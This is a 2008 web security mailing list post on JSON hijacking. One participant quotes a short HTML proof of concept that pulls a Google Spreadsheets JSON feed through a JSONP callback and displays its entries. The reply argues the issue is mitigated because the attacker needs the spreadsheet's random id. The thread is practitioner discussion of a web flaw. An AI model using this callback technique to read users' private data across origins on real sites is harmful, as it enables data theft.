Re: [WEB SECURITY] JSON Hijacking - Cross-browser issue

[kuza55 <kuza55@xxxxxxxxx>]

Sure, except this isn't really a vulnerability unless you can get
(what, from your post looks like) the random id associated with the
spreadsheet, so to me this issue seems mitigated properly.

2008/8/15 application.secure application.secure <application.secure@xxxxxxxxx>:
> My conclusion is that call-back pattern is insecure... Avoid the use of
> call-back pattern.
>
> ----------------------------------------------------
> <html>
> <script>
> function listEntries(json){
>     ret="";
>     for (var i = 0; i < json.feed.entry.length; i++) {
>
>     var entry = json.feed.entry[i];
>     ret+=entry.title.$t;
>     ret+=entry.content.$t;
>   }
>   alert(ret);
> }
> </script>
> <script id="external_script"
> src="http://spreadsheets.google.com/feeds/list/o13394135408524254648.240766968415752635/od6/public/values?alt=json-in-script&callback=listEntries";></script>
> </html>
> ----------------------------------------------------
>

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA